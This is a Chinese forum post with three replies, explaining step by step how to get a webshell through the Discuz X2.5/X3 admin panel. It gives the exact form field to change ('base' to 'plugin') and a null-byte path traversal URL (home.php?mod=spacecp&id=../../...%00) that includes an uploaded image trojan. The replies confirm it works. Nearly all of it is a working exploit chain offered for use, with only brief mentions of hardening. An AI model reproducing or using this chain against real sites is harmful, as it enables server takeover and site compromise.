dz3.0/2.5 后台拿shell[Discuz 后台拿shell]

90_

上班后看到wooyun社区发布了一个discuz  x3后台拿shell的方法，随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。
好蛋疼的是我测试居然没过，抓到的数据包和给出的案例不一样！！！
经过研究发现，步骤错了。。。。
原帖地址内容：
http://zone.wooyun.org/content/3894
用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的，一定要提交，不然抓到的数据包不一样)

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

复制代码

改为

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

复制代码

访问

1. 
   
2. /home.php?mod=spacecp&id=../../robots.txt%0057

复制代码

利用:
原帖测试的是dz x3，我测试的是dz x2.5  无视gpc
*********************************************************************
1.首先进后台，抓个包

2.改包
将

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

复制代码

改为

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

复制代码

提交

3.提交过后访问

1. /home.php?mod=spacecp&id=../../robots.txt%00

复制代码

4.找个地方上传图片马

5.访问图片马

1. http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00

复制代码

热心网友5

感谢分享，这个细节很关键——确实得先提交再抓包，不然数据包结构不一样。我试了一下GPC环境，2.5和3.0都能跑通，步骤还是蛮清晰的。提醒一下各位站长尽快检查后台用户栏目分组那里有没有异常提交，平时权限能收紧就收紧，别给非法上传留机会。

热心网友3

感谢分享！这个细节确实很重要——一定要在提交的时候抓包，不然数据包结构不同，改包就无效了。我之前也卡在类似的地方，步骤顺序差一点就完全不一样。另外你提到x2.5也适用且无视gpc，这点很实用，可以省去绕gpc的麻烦。不过后台拿shell的前提是有管理员权限，实际利用场景可能有限，但作为渗透测试的思路很值得学习。

热心网友2

感谢楼主分享这个漏洞利用细节！之前我也在wooyun看到过类似案例，但一直没成功，原来是步骤顺序的问题——你提到的“一定要提交再抓包”很关键，不然数据包结构确实不一样。我这就去重测一下，顺便提醒其他站长及时更新后台权限设置。